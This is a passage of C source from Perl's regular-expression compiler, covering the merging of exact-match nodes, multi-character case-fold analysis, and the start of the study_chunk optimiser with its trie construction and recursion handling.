OP(scan) = EXACTF;
}
}
else if (OP(scan) == EXACTFU_S_EDGE && OP(n) == EXACTFU) {
if (STRING(n)[0] == 's') {
; /* Here the join is compatible and the combined node
starts with 's', no need to change OP */
}
else { /* Now the trailing 's' is in the interior */
OP(scan) = EXACTFU;
}
}
else if (OP(scan) == EXACTFU_S_EDGE && OP(n) == EXACTF) {
/* The join is compatible, and the combined node will be
* EXACTF. (These don't care if they begin or end with 's' */
OP(scan) = EXACTF;
}
else if (OP(scan) != OP(n)) {
/* The only other compatible joinings are the same node type */
break;
}
DEBUG_PEEP("merg", n, depth, 0);
merged++;
NEXT_OFF(scan) += NEXT_OFF(n);
STR_LEN(scan) += STR_LEN(n);
next = n + NODE_SZ_STR(n);
/* Now we can overwrite *n : */
Move(STRING(n), STRING(scan) + oldl, STR_LEN(n), char);
#ifdef DEBUGGING
stop = next - 1;
#endif
n = nnext;
if (stopnow) break;
}
#ifdef EXPERIMENTAL_INPLACESCAN
if (flags && !NEXT_OFF(n)) {
DEBUG_PEEP("atch", val, depth, 0);
if (reg_off_by_arg[OP(n)]) {
ARG_SET(n, val - n);
}
else {
NEXT_OFF(n) = val - n;
}
stopnow = 1;
}
#endif
}
/* This temporary node can now be turned into EXACTFU, and must, as
* regexec.c doesn't handle it */
if (OP(scan) == EXACTFU_S_EDGE) {
OP(scan) = EXACTFU;
}
*min_subtract = 0;
*unfolded_multi_char = FALSE;
/* Here, all the adjacent mergeable EXACTish nodes have been merged. We
* can now analyze for sequences of problematic code points. (Prior to
* this final joining, sequences could have been split over boundaries, and
* hence missed). The sequences only happen in folding, hence for any
* non-EXACT EXACTish node */
if (OP(scan) != EXACT && OP(scan) != EXACT_ONLY8 && OP(scan) != EXACTL) {
U8* s0 = (U8*) STRING(scan);
U8* s = s0;
U8* s_end = s0 + STR_LEN(scan);
int total_count_delta = 0; /* Total delta number of characters that
multi-char folds expand to */
/* One pass is made over the node's string looking for all the
* possibilities. To avoid some tests in the loop, there are two main
* cases, for UTF-8 patterns (which can't have EXACTF nodes) and
* non-UTF-8 */
if (UTF) {
U8* folded = NULL;
if (OP(scan) == EXACTFL) {
U8 *d;
/* An EXACTFL node would already have been changed to another
* node type unless there is at least one character in it that
* is problematic; likely a character whose fold definition
* won't be known until runtime, and so has yet to be folded.
* For all but the UTF-8 locale, folds are 1-1 in length, but
* to handle the UTF-8 case, we need to create a temporary
* folded copy using UTF-8 locale rules in order to analyze it.
* This is because our macros that look to see if a sequence is
* a multi-char fold assume everything is folded (otherwise the
* tests in those macros would be too complicated and slow).
* Note that here, the non-problematic folds will have already
* been done, so we can just copy such characters. We actually
* don't completely fold the EXACTFL string. We skip the
* unfolded multi-char folds, as that would just create work
* below to figure out the size they already are */
Newx(folded, UTF8_MAX_FOLD_CHAR_EXPAND * STR_LEN(scan) + 1, U8);
d = folded;
while (s < s_end) {
STRLEN s_len = UTF8SKIP(s);
if (! is_PROBLEMATIC_LOCALE_FOLD_utf8(s)) {
Copy(s, d, s_len, U8);
d += s_len;
}
else if (is_FOLDS_TO_MULTI_utf8(s)) {
*unfolded_multi_char = TRUE;
Copy(s, d, s_len, U8);
d += s_len;
}
else if (isASCII(*s)) {
*(d++) = toFOLD(*s);
}
else {
STRLEN len;
_toFOLD_utf8_flags(s, s_end, d, &len, FOLD_FLAGS_FULL);
d += len;
}
s += s_len;
}
/* Point the remainder of the routine to look at our temporary
* folded copy */
s = folded;
s_end = d;
} /* End of creating folded copy of EXACTFL string */
/* Examine the string for a multi-character fold sequence. UTF-8
* patterns have all characters pre-folded by the time this code is
* executed */
while (s < s_end - 1) /* Can stop 1 before the end, as minimum
length sequence we are looking for is 2 */
{
int count = 0; /* How many characters in a multi-char fold */
int len = is_MULTI_CHAR_FOLD_utf8_safe(s, s_end);
if (! len) { /* Not a multi-char fold: get next char */
s += UTF8SKIP(s);
continue;
}
{ /* Here is a generic multi-char fold. */
U8* multi_end = s + len;
/* Count how many characters are in it. In the case of
* /aa, no folds which contain ASCII code points are
* allowed, so check for those, and skip if found. */
if (OP(scan) != EXACTFAA && OP(scan) != EXACTFAA_NO_TRIE) {
count = utf8_length(s, multi_end);
s = multi_end;
}
else {
while (s < multi_end) {
if (isASCII(*s)) {
s++;
goto next_iteration;
}
else {
s += UTF8SKIP(s);
}
count++;
}
}
}
/* The delta is how long the sequence is minus 1 (1 is how long
* the character that folds to the sequence is) */
total_count_delta += count - 1;
next_iteration: ;
}
/* We created a temporary folded copy of the string in EXACTFL
* nodes. Therefore we need to be sure it doesn't go below zero,
* as the real string could be shorter */
if (OP(scan) == EXACTFL) {
int total_chars = utf8_length((U8*) STRING(scan),
(U8*) STRING(scan) + STR_LEN(scan));
if (total_count_delta > total_chars) {
total_count_delta = total_chars;
}
}
*min_subtract += total_count_delta;
Safefree(folded);
}
else if (OP(scan) == EXACTFAA) {
/* Non-UTF-8 pattern, EXACTFAA node. There can't be a multi-char
* fold to the ASCII range (and there are no existing ones in the
* upper latin1 range). But, as outlined in the comments preceding
* this function, we need to flag any occurrences of the sharp s.
* This character forbids trie formation (because of added
* complexity) */
#if UNICODE_MAJOR_VERSION > 3 /* no multifolds in early Unicode */ \
|| (UNICODE_MAJOR_VERSION == 3 && ( UNICODE_DOT_VERSION > 0) \
|| UNICODE_DOT_DOT_VERSION > 0)
while (s < s_end) {
if (*s == LATIN_SMALL_LETTER_SHARP_S) {
OP(scan) = EXACTFAA_NO_TRIE;
*unfolded_multi_char = TRUE;
break;
}
s++;
}
}
else {
/* Non-UTF-8 pattern, not EXACTFAA node. Look for the multi-char
* folds that are all Latin1. As explained in the comments
* preceding this function, we look also for the sharp s in EXACTF
* and EXACTFL nodes; it can be in the final position. Otherwise
* we can stop looking 1 byte earlier because have to find at least
* two characters for a multi-fold */
const U8* upper = (OP(scan) == EXACTF || OP(scan) == EXACTFL)
? s_end
: s_end -1;
while (s < upper) {
int len = is_MULTI_CHAR_FOLD_latin1_safe(s, s_end);
if (! len) { /* Not a multi-char fold. */
if (*s == LATIN_SMALL_LETTER_SHARP_S
&& (OP(scan) == EXACTF || OP(scan) == EXACTFL))
{
*unfolded_multi_char = TRUE;
}
s++;
continue;
}
if (len == 2
&& isALPHA_FOLD_EQ(*s, 's')
&& isALPHA_FOLD_EQ(*(s+1), 's'))
{
/* EXACTF nodes need to know that the minimum length
* changed so that a sharp s in the string can match this
* ss in the pattern, but they remain EXACTF nodes, as they
* won't match this unless the target string is is UTF-8,
* which we don't know until runtime. EXACTFL nodes can't
* transform into EXACTFU nodes */
if (OP(scan) != EXACTF && OP(scan) != EXACTFL) {
OP(scan) = EXACTFUP;
}
}
*min_subtract += len - 1;
s += len;
}
#endif
}
if ( STR_LEN(scan) == 1
&& isALPHA_A(* STRING(scan))
&& ( OP(scan) == EXACTFAA
|| ( OP(scan) == EXACTFU
&& ! HAS_NONLATIN1_SIMPLE_FOLD_CLOSURE(* STRING(scan)))))
{
U8 mask = ~ ('A' ^ 'a'); /* These differ in just one bit */
/* Replace a length 1 ASCII fold pair node with an ANYOFM node,
* with the mask set to the complement of the bit that differs
* between upper and lower case, and the lowest code point of the
* pair (which the '&' forces) */
OP(scan) = ANYOFM;
ARG_SET(scan, *STRING(scan) & mask);
FLAGS(scan) = mask;
}
}
#ifdef DEBUGGING
/* Allow dumping but overwriting the collection of skipped
* ops and/or strings with fake optimized ops */
n = scan + NODE_SZ_STR(scan);
while (n <= stop) {
OP(n) = OPTIMIZED;
FLAGS(n) = 0;
NEXT_OFF(n) = 0;
n++;
}
#endif
DEBUG_OPTIMISE_r(if (merged){DEBUG_PEEP("finl", scan, depth, 0);});
return stopnow;
}
/* REx optimizer. Converts nodes into quicker variants "in place".
Finds fixed substrings. */
/* Stops at toplevel WHILEM as well as at "last". At end *scanp is set
to the position after last scanned or to NULL. */
#define INIT_AND_WITHP \
assert(!and_withp); \
Newx(and_withp, 1, regnode_ssc); \
SAVEFREEPV(and_withp)
static void
S_unwind_scan_frames(pTHX_ const void *p)
{
scan_frame *f= (scan_frame *)p;
do {
scan_frame *n= f->next_frame;
Safefree(f);
f= n;
} while (f);
}
/* Follow the next-chain of the current node and optimize away
all the NOTHINGs from it.
*/
STATIC void
S_rck_elide_nothing(pTHX_ regnode *node)
{
dVAR;
PERL_ARGS_ASSERT_RCK_ELIDE_NOTHING;
if (OP(node) != CURLYX) {
const int max = (reg_off_by_arg[OP(node)]
? I32_MAX
/* I32 may be smaller than U16 on CRAYs! */
: (I32_MAX < U16_MAX ? I32_MAX : U16_MAX));
int off = (reg_off_by_arg[OP(node)] ? ARG(node) : NEXT_OFF(node));
int noff;
regnode *n = node;
/* Skip NOTHING and LONGJMP. */
while (
(n = regnext(n))
&& (
(PL_regkind[OP(n)] == NOTHING && (noff = NEXT_OFF(n)))
|| ((OP(n) == LONGJMP) && (noff = ARG(n)))
)
&& off + noff < max
) {
off += noff;
}
if (reg_off_by_arg[OP(node)])
ARG(node) = off;
else
NEXT_OFF(node) = off;
}
return;
}
/* the return from this sub is the minimum length that could possibly match */
STATIC SSize_t
S_study_chunk(pTHX_ RExC_state_t *pRExC_state, regnode **scanp,
SSize_t *minlenp, SSize_t *deltap,
regnode *last,
scan_data_t *data,
I32 stopparen,
U32 recursed_depth,
regnode_ssc *and_withp,
U32 flags, U32 depth)
/* scanp: Start here (read-write). */
/* deltap: Write maxlen-minlen here. */
/* last: Stop before this one. */
/* data: string data about the pattern */
/* stopparen: treat close N as END */
/* recursed: which subroutines have we recursed into */
/* and_withp: Valid if flags & SCF_DO_STCLASS_OR */
{
dVAR;
/* There must be at least this number of characters to match */
SSize_t min = 0;
I32 pars = 0, code;
regnode *scan = *scanp, *next;
SSize_t delta = 0;
int is_inf = (flags & SCF_DO_SUBSTR) && (data->flags & SF_IS_INF);
int is_inf_internal = 0; /* The studied chunk is infinite */
I32 is_par = OP(scan) == OPEN ? ARG(scan) : 0;
scan_data_t data_fake;
SV *re_trie_maxbuff = NULL;
regnode *first_non_open = scan;
SSize_t stopmin = SSize_t_MAX;
scan_frame *frame = NULL;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_STUDY_CHUNK;
RExC_study_started= 1;
Zero(&data_fake, 1, scan_data_t);
if ( depth == 0 ) {
while (first_non_open && OP(first_non_open) == OPEN)
first_non_open=regnext(first_non_open);
}
fake_study_recurse:
DEBUG_r(
RExC_study_chunk_recursed_count++;
);
DEBUG_OPTIMISE_MORE_r(
{
Perl_re_indentf( aTHX_ "study_chunk stopparen=%ld recursed_count=%lu depth=%lu recursed_depth=%lu scan=%p last=%p",
depth, (long)stopparen,
(unsigned long)RExC_study_chunk_recursed_count,
(unsigned long)depth, (unsigned long)recursed_depth,
scan,
last);
if (recursed_depth) {
U32 i;
U32 j;
for ( j = 0 ; j < recursed_depth ; j++ ) {
for ( i = 0 ; i < (U32)RExC_total_parens ; i++ ) {
if (
PAREN_TEST(RExC_study_chunk_recursed +
( j * RExC_study_chunk_recursed_bytes), i )
&& (
!j ||
!PAREN_TEST(RExC_study_chunk_recursed +
(( j - 1 ) * RExC_study_chunk_recursed_bytes), i)
)
) {
Perl_re_printf( aTHX_ " %d",(int)i);
break;
}
}
if ( j + 1 < recursed_depth ) {
Perl_re_printf( aTHX_ ",");
}
}
}
Perl_re_printf( aTHX_ "\n");
}
);
while ( scan && OP(scan) != END && scan < last ){
UV min_subtract = 0; /* How mmany chars to subtract from the minimum
node length to get a real minimum (because
the folded version may be shorter) */
bool unfolded_multi_char = FALSE;
/* Peephole optimizer: */
DEBUG_STUDYDATA("Peep", data, depth, is_inf);
DEBUG_PEEP("Peep", scan, depth, flags);
/* The reason we do this here is that we need to deal with things like
* /(?:f)(?:o)(?:o)/ which cant be dealt with by the normal EXACT
* parsing code, as each (?:..) is handled by a different invocation of
* reg() -- Yves
*/
JOIN_EXACT(scan,&min_subtract, &unfolded_multi_char, 0);
/* Follow the next-chain of the current node and optimize
away all the NOTHINGs from it.
*/
rck_elide_nothing(scan);
/* The principal pseudo-switch. Cannot be a switch, since we
look into several different things. */
if ( OP(scan) == DEFINEP ) {
SSize_t minlen = 0;
SSize_t deltanext = 0;
SSize_t fake_last_close = 0;
I32 f = SCF_IN_DEFINE;
StructCopy(&zero_scan_data, &data_fake, scan_data_t);
scan = regnext(scan);
assert( OP(scan) == IFTHEN );
DEBUG_PEEP("expect IFTHEN", scan, depth, flags);
data_fake.last_closep= &fake_last_close;
minlen = *minlenp;
next = regnext(scan);
scan = NEXTOPER(NEXTOPER(scan));
DEBUG_PEEP("scan", scan, depth, flags);
DEBUG_PEEP("next", next, depth, flags);
/* we suppose the run is continuous, last=next...
* NOTE we dont use the return here! */
/* DEFINEP study_chunk() recursion */
(void)study_chunk(pRExC_state, &scan, &minlen,
&deltanext, next, &data_fake, stopparen,
recursed_depth, NULL, f, depth+1);
scan = next;
} else
if (
OP(scan) == BRANCH ||
OP(scan) == BRANCHJ ||
OP(scan) == IFTHEN
) {
next = regnext(scan);
code = OP(scan);
/* The op(next)==code check below is to see if we
* have "BRANCH-BRANCH", "BRANCHJ-BRANCHJ", "IFTHEN-IFTHEN"
* IFTHEN is special as it might not appear in pairs.
* Not sure whether BRANCH-BRANCHJ is possible, regardless
* we dont handle it cleanly. */
if (OP(next) == code || code == IFTHEN) {
/* NOTE - There is similar code to this block below for
* handling TRIE nodes on a re-study. If you change stuff here
* check there too. */
SSize_t max1 = 0, min1 = SSize_t_MAX, num = 0;
regnode_ssc accum;
regnode * const startbranch=scan;
if (flags & SCF_DO_SUBSTR) {
/* Cannot merge strings after this. */
scan_commit(pRExC_state, data, minlenp, is_inf);
}
if (flags & SCF_DO_STCLASS)
ssc_init_zero(pRExC_state, &accum);
while (OP(scan) == code) {
SSize_t deltanext, minnext, fake;
I32 f = 0;
regnode_ssc this_class;
DEBUG_PEEP("Branch", scan, depth, flags);
num++;
StructCopy(&zero_scan_data, &data_fake, scan_data_t);
if (data) {
data_fake.whilem_c = data->whilem_c;
data_fake.last_closep = data->last_closep;
}
else
data_fake.last_closep = &fake;
data_fake.pos_delta = delta;
next = regnext(scan);
scan = NEXTOPER(scan); /* everything */
if (code != BRANCH) /* everything but BRANCH */
scan = NEXTOPER(scan);
if (flags & SCF_DO_STCLASS) {
ssc_init(pRExC_state, &this_class);
data_fake.start_class = &this_class;
f = SCF_DO_STCLASS_AND;
}
if (flags & SCF_WHILEM_VISITED_POS)
f |= SCF_WHILEM_VISITED_POS;
/* we suppose the run is continuous, last=next...*/
/* recurse study_chunk() for each BRANCH in an alternation */
minnext = study_chunk(pRExC_state, &scan, minlenp,
&deltanext, next, &data_fake, stopparen,
recursed_depth, NULL, f, depth+1);
if (min1 > minnext)
min1 = minnext;
if (deltanext == SSize_t_MAX) {
is_inf = is_inf_internal = 1;
max1 = SSize_t_MAX;
} else if (max1 < minnext + deltanext)
max1 = minnext + deltanext;
scan = next;
if (data_fake.flags & (SF_HAS_PAR|SF_IN_PAR))
pars++;
if (data_fake.flags & SCF_SEEN_ACCEPT) {
if ( stopmin > minnext)
stopmin = min + min1;
flags &= ~SCF_DO_SUBSTR;
if (data)
data->flags |= SCF_SEEN_ACCEPT;
}
if (data) {
if (data_fake.flags & SF_HAS_EVAL)
data->flags |= SF_HAS_EVAL;
data->whilem_c = data_fake.whilem_c;
}
if (flags & SCF_DO_STCLASS)
ssc_or(pRExC_state, &accum, (regnode_charclass*)&this_class);
}
if (code == IFTHEN && num < 2) /* Empty ELSE branch */
min1 = 0;
if (flags & SCF_DO_SUBSTR) {
data->pos_min += min1;
if (data->pos_delta >= SSize_t_MAX - (max1 - min1))
data->pos_delta = SSize_t_MAX;
else
data->pos_delta += max1 - min1;
if (max1 != min1 || is_inf)
data->cur_is_floating = 1;
}
min += min1;
if (delta == SSize_t_MAX
|| SSize_t_MAX - delta - (max1 - min1) < 0)
delta = SSize_t_MAX;
else
delta += max1 - min1;
if (flags & SCF_DO_STCLASS_OR) {
ssc_or(pRExC_state, data->start_class, (regnode_charclass*) &accum);
if (min1) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) and_withp);
flags &= ~SCF_DO_STCLASS;
}
}
else if (flags & SCF_DO_STCLASS_AND) {
if (min1) {
ssc_and(pRExC_state, data->start_class, (regnode_charclass *) &accum);
flags &= ~SCF_DO_STCLASS;
}
else {
/* Switch to OR mode: cache the old value of
* data->start_class */
INIT_AND_WITHP;
StructCopy(data->start_class, and_withp, regnode_ssc);
flags &= ~SCF_DO_STCLASS_AND;
StructCopy(&accum, data->start_class, regnode_ssc);
flags |= SCF_DO_STCLASS_OR;
}
}
if (PERL_ENABLE_TRIE_OPTIMISATION &&
OP( startbranch ) == BRANCH )
{
/* demq.
Assuming this was/is a branch we are dealing with: 'scan'
now points at the item that follows the branch sequence,
whatever it is. We now start at the beginning of the
sequence and look for subsequences of
BRANCH->EXACT=>x1
BRANCH->EXACT=>x2
tail
which would be constructed from a pattern like
/A|LIST|OF|WORDS/
If we can find such a subsequence we need to turn the first
element into a trie and then add the subsequent branch exact
strings to the trie.
We have two cases
1. patterns where the whole set of branches can be
converted.
2. patterns where only a subset can be converted.
In case 1 we can replace the whole set with a single regop
for the trie. In case 2 we need to keep the start and end
branches so
'BRANCH EXACT; BRANCH EXACT; BRANCH X'
becomes BRANCH TRIE; BRANCH X;
There is an additional case, that being where there is a
common prefix, which gets split out into an EXACT like node
preceding the TRIE node.
If x(1..n)==tail then we can do a simple trie, if not we make
a "jump" trie, such that when we match the appropriate word
we "jump" to the appropriate tail node. Essentially we turn
a nested if into a case structure of sorts.
*/
int made=0;
if (!re_trie_maxbuff) {
re_trie_maxbuff = get_sv(RE_TRIE_MAXBUF_NAME, 1);
if (!SvIOK(re_trie_maxbuff))
sv_setiv(re_trie_maxbuff, RE_TRIE_MAXBUF_INIT);
}
if ( SvIV(re_trie_maxbuff)>=0 ) {
regnode *cur;
regnode *first = (regnode *)NULL;
regnode *last = (regnode *)NULL;
regnode *tail = scan;
U8 trietype = 0;
U32 count=0;
/* var tail is used because there may be a TAIL
regop in the way. Ie, the exacts will point to the
thing following the TAIL, but the last branch will
point at the TAIL. So we advance tail. If we
have nested (?:) we may have to move through several
tails.
*/
while ( OP( tail ) == TAIL ) {
/* this is the TAIL generated by (?:) */
tail = regnext( tail );
}
DEBUG_TRIE_COMPILE_r({
regprop(RExC_rx, RExC_mysv, tail, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "%s %" UVuf ":%s\n",
depth+1,
"Looking for TRIE'able sequences. Tail node is ",
(UV) REGNODE_OFFSET(tail),
SvPV_nolen_const( RExC_mysv )
);
});
/*
Step through the branches
cur represents each branch,
noper is the first thing to be matched as part
of that branch
noper_next is the regnext() of that node.
We normally handle a case like this
/FOO[xyz]|BAR[pqr]/ via a "jump trie" but we also
support building with NOJUMPTRIE, which restricts
the trie logic to structures like /FOO|BAR/.
If noper is a trieable nodetype then the branch is
a possible optimization target. If we are building
under NOJUMPTRIE then we require that noper_next is
the same as scan (our current position in the regex
program).
Once we have two or more consecutive such branches
we can create a trie of the EXACT's contents and
stitch it in place into the program.
If the sequence represents all of the branches in
the alternation we replace the entire thing with a
single TRIE node.
Otherwise when it is a subsequence we need to
stitch it in place and replace only the relevant
branches. This means the first branch has to remain
as it is used by the alternation logic, and its
next pointer, and needs to be repointed at the item
on the branch chain following the last branch we
have optimized away.
This could be either a BRANCH, in which case the
subsequence is internal, or it could be the item
following the branch sequence in which case the
subsequence is at the end (which does not
necessarily mean the first node is the start of the
alternation).
TRIE_TYPE(X) is a define which maps the optype to a
trietype.
optype | trietype
----------------+-----------
NOTHING | NOTHING
EXACT | EXACT
EXACT_ONLY8 | EXACT
EXACTFU | EXACTFU
EXACTFU_ONLY8 | EXACTFU
EXACTFUP | EXACTFU
EXACTFAA | EXACTFAA
EXACTL | EXACTL
EXACTFLU8 | EXACTFLU8
*/
#define TRIE_TYPE(X) ( ( NOTHING == (X) ) \
? NOTHING \
: ( EXACT == (X) || EXACT_ONLY8 == (X) ) \
? EXACT \
: ( EXACTFU == (X) \
|| EXACTFU_ONLY8 == (X) \
|| EXACTFUP == (X) ) \
? EXACTFU \
: ( EXACTFAA == (X) ) \
? EXACTFAA \
: ( EXACTL == (X) ) \
? EXACTL \
: ( EXACTFLU8 == (X) ) \
? EXACTFLU8 \
: 0 )
/* dont use tail as the end marker for this traverse */
for ( cur = startbranch ; cur != scan ; cur = regnext( cur ) ) {
regnode * const noper = NEXTOPER( cur );
U8 noper_type = OP( noper );
U8 noper_trietype = TRIE_TYPE( noper_type );
#if defined(DEBUGGING) || defined(NOJUMPTRIE)
regnode * const noper_next = regnext( noper );
U8 noper_next_type = (noper_next && noper_next < tail) ? OP(noper_next) : 0;
U8 noper_next_trietype = (noper_next && noper_next < tail) ? TRIE_TYPE( noper_next_type ) :0;
#endif
DEBUG_TRIE_COMPILE_r({
regprop(RExC_rx, RExC_mysv, cur, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "- %d:%s (%d)",
depth+1,
REG_NODE_NUM(cur), SvPV_nolen_const( RExC_mysv ), REG_NODE_NUM(cur) );
regprop(RExC_rx, RExC_mysv, noper, NULL, pRExC_state);
Perl_re_printf( aTHX_ " -> %d:%s",
REG_NODE_NUM(noper), SvPV_nolen_const(RExC_mysv));
if ( noper_next ) {
regprop(RExC_rx, RExC_mysv, noper_next, NULL, pRExC_state);
Perl_re_printf( aTHX_ "\t=> %d:%s\t",
REG_NODE_NUM(noper_next), SvPV_nolen_const(RExC_mysv));
}
Perl_re_printf( aTHX_ "(First==%d,Last==%d,Cur==%d,tt==%s,ntt==%s,nntt==%s)\n",
REG_NODE_NUM(first), REG_NODE_NUM(last), REG_NODE_NUM(cur),
PL_reg_name[trietype], PL_reg_name[noper_trietype], PL_reg_name[noper_next_trietype]
);
});
/* Is noper a trieable nodetype that can be merged
* with the current trie (if there is one)? */
if ( noper_trietype
&&
(
( noper_trietype == NOTHING )
|| ( trietype == NOTHING )
|| ( trietype == noper_trietype )
)
#ifdef NOJUMPTRIE
&& noper_next >= tail
#endif
&& count < U16_MAX)
{
/* Handle mergable triable node Either we are
* the first node in a new trieable sequence,
* in which case we do some bookkeeping,
* otherwise we update the end pointer. */
if ( !first ) {
first = cur;
if ( noper_trietype == NOTHING ) {
#if !defined(DEBUGGING) && !defined(NOJUMPTRIE)
regnode * const noper_next = regnext( noper );
U8 noper_next_type = (noper_next && noper_next < tail) ? OP(noper_next) : 0;
U8 noper_next_trietype = noper_next_type ? TRIE_TYPE( noper_next_type ) :0;
#endif
if ( noper_next_trietype ) {
trietype = noper_next_trietype;
} else if (noper_next_type) {
/* a NOTHING regop is 1 regop wide.
* We need at least two for a trie
* so we can't merge this in */
first = NULL;
}
} else {
trietype = noper_trietype;
}
} else {
if ( trietype == NOTHING )
trietype = noper_trietype;
last = cur;
}
if (first)
count++;
} /* end handle mergable triable node */
else {
/* handle unmergable node -
* noper may either be a triable node which can
* not be tried together with the current trie,
* or a non triable node */
if ( last ) {
/* If last is set and trietype is not
* NOTHING then we have found at least two
* triable branch sequences in a row of a
* similar trietype so we can turn them
* into a trie. If/when we allow NOTHING to
* start a trie sequence this condition
* will be required, and it isn't expensive
* so we leave it in for now. */
if ( trietype && trietype != NOTHING )
make_trie( pRExC_state,
startbranch, first, cur, tail,
count, trietype, depth+1 );
last = NULL; /* note: we clear/update
first, trietype etc below,
so we dont do it here */
}
if ( noper_trietype
#ifdef NOJUMPTRIE
&& noper_next >= tail
#endif
){
/* noper is triable, so we can start a new
* trie sequence */
count = 1;
first = cur;
trietype = noper_trietype;
} else if (first) {
/* if we already saw a first but the
* current node is not triable then we have
* to reset the first information. */
count = 0;
first = NULL;
trietype = 0;
}
} /* end handle unmergable node */
} /* loop over branches */
DEBUG_TRIE_COMPILE_r({
regprop(RExC_rx, RExC_mysv, cur, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "- %s (%d) <SCAN FINISHED> ",
depth+1, SvPV_nolen_const( RExC_mysv ), REG_NODE_NUM(cur));
Perl_re_printf( aTHX_ "(First==%d, Last==%d, Cur==%d, tt==%s)\n",
REG_NODE_NUM(first), REG_NODE_NUM(last), REG_NODE_NUM(cur),
PL_reg_name[trietype]
);
});
if ( last && trietype ) {
if ( trietype != NOTHING ) {
/* the last branch of the sequence was part of
* a trie, so we have to construct it here
* outside of the loop */
made= make_trie( pRExC_state, startbranch,
first, scan, tail, count,
trietype, depth+1 );
#ifdef TRIE_STUDY_OPT
if ( ((made == MADE_EXACT_TRIE &&
startbranch == first)
|| ( first_non_open == first )) &&
depth==0 ) {
flags |= SCF_TRIE_RESTUDY;
if ( startbranch == first
&& scan >= tail )
{
RExC_seen &=~REG_TOP_LEVEL_BRANCHES_SEEN;
}
}
#endif
} else {
/* at this point we know whatever we have is a
* NOTHING sequence/branch AND if 'startbranch'
* is 'first' then we can turn the whole thing
* into a NOTHING
*/
if ( startbranch == first ) {
regnode *opt;
/* the entire thing is a NOTHING sequence,
* something like this: (?:|) So we can
* turn it into a plain NOTHING op. */
DEBUG_TRIE_COMPILE_r({
regprop(RExC_rx, RExC_mysv, cur, NULL, pRExC_state);
Perl_re_indentf( aTHX_ "- %s (%d) <NOTHING BRANCH SEQUENCE>\n",
depth+1,
SvPV_nolen_const( RExC_mysv ), REG_NODE_NUM(cur));
});
OP(startbranch)= NOTHING;
NEXT_OFF(startbranch)= tail - startbranch;
for ( opt= startbranch + 1; opt < tail ; opt++ )
OP(opt)= OPTIMIZED;
}
}
} /* end if ( last) */
} /* TRIE_MAXBUF is non zero */
} /* do trie */
}
else if ( code == BRANCHJ ) { /* single branch is optimized. */
scan = NEXTOPER(NEXTOPER(scan));
} else /* single branch is optimized. */
scan = NEXTOPER(scan);
continue;
} else if (OP(scan) == SUSPEND || OP(scan) == GOSUB) {
I32 paren = 0;
regnode *start = NULL;
regnode *end = NULL;
U32 my_recursed_depth= recursed_depth;
if (OP(scan) != SUSPEND) { /* GOSUB */
/* Do setup, note this code has side effects beyond
* the rest of this block. Specifically setting
* RExC_recurse[] must happen at least once during
* study_chunk(). */
paren = ARG(scan);
RExC_recurse[ARG2L(scan)] = scan;
start = REGNODE_p(RExC_open_parens[paren]);
end = REGNODE_p(RExC_close_parens[paren]);
/* NOTE we MUST always execute the above code, even
* if we do nothing with a GOSUB */
if (
( flags & SCF_IN_DEFINE )
||
(
(is_inf_internal || is_inf || (data && data->flags & SF_IS_INF))
&&
( (flags & (SCF_DO_STCLASS | SCF_DO_SUBSTR)) == 0 )
)
) {
/* no need to do anything here if we are in a define. */
/* or we are after some kind of infinite construct
* so we can skip recursing into this item.
* Since it is infinite we will not change the maxlen
* or delta, and if we miss something that might raise
* the minlen it will merely pessimise a little.
*
* Iow /(?(DEFINE)(?<foo>foo|food))a+(?&foo)/
* might result in a minlen of 1 and not of 4,
* but this doesn't make us mismatch, just try a bit
* harder than we should.
* */
scan= regnext(scan);
continue;
}
if (
!recursed_depth
||
!PAREN_TEST(RExC_study_chunk_recursed + ((recursed_depth-1) * RExC_study_chunk_recursed_bytes), paren)
) {
/* it is quite possible that there are more efficient ways
* to do this. We maintain a bitmap per level of recursion
* of which patterns we have entered so we can detect if a
* pattern creates a possible infinite loop. When we
* recurse down a level we copy the previous levels bitmap
* down. When we are at recursion level 0 we zero the top
* level bitmap. It would be nice to implement a different
* more efficient way of doing this. In particular the top
* level bitmap may be unnecessary.
*/
if (!recursed_depth) {
Zero(RExC_study_chunk_recursed, RExC_study_chunk_recursed_bytes, U8);
} else {
Copy(RExC_study_chunk_recursed + ((recursed_depth-1) * RExC_study_chunk_recursed_bytes),
RExC_study_chunk_recursed + (recursed_depth * RExC_study_chunk_recursed_bytes),
RExC_study_chunk_recursed_bytes, U8);
}
/* we havent recursed into this paren yet, so recurse into it */
DEBUG_STUDYDATA("gosub-set", data, depth, is_inf);
PAREN_SET(RExC_study_chunk_recursed + (recursed_depth * RExC_study_chunk_recursed_bytes), paren);
my_recursed_depth= recursed_depth + 1;
} else {
DEBUG_STUDYDATA("gosub-inf", data, depth, is_inf);
/* some form of infinite recursion, assume infinite length
* */
if (flags & SCF_DO_SUBSTR) {
scan_commit(pRExC_state, data, minlenp, is_inf);
data->cur_is_floating = 1;
}
is_inf = is_inf_internal = 1;
if (flags & SCF_DO_STCLASS_OR) /* Allow everything */
ssc_anything(data->start_class);
flags &= ~SCF_DO_STCLASS;
start= NULL; /* reset start so we dont recurse later on. */
}
} else {
paren = stopparen;
start = scan + 2;
end = regnext(scan);
}
if (start) {
scan_frame *newframe;
assert(end);
if (!RExC_frame_last) {
Newxz(newframe, 1, scan_frame);
SAVEDESTRUCTOR_X(S_unwind_scan_frames, newframe);
RExC_frame_head= newframe;
RExC_frame_count++;
} else if (!RExC_frame_last->next_frame) {
Newxz(newframe, 1, scan_frame);
RExC_frame_last->next_frame= newframe;
newframe->prev_frame= RExC_frame_last;
RExC_frame_count++;
} else {
newframe= RExC_frame_last->next_frame;
}
RExC_frame_last= newframe;
newframe->next_regnode = regnext(scan);
newframe->last_regnode = last;
newframe->stopparen = stopparen;
newframe->prev_recursed_depth = recursed_depth;
newframe->this_prev_frame= frame;
DEBUG_STUDYDATA("frame-new", data, depth, is_inf);
DEBUG_PEEP("fnew", scan, depth, flags);
frame = newframe;
scan = start;
stopparen = paren;
last = end;
depth = depth + 1;
recursed_depth= my_recursed_depth;
continue;
}
}
else if ( OP(scan) == EXACT
|| OP(scan) == EXACT_ONLY8
|| OP(scan) == EXACTL)
{
SSize_t l = STR_LEN(scan);
UV uc;
assert(l);
if (UTF) {
const U8 * const s = (U8*)STRING(scan);
uc = utf8_to_uvchr_buf(s, s + l, NULL);
l = utf8_length(s, s + l);
} else {
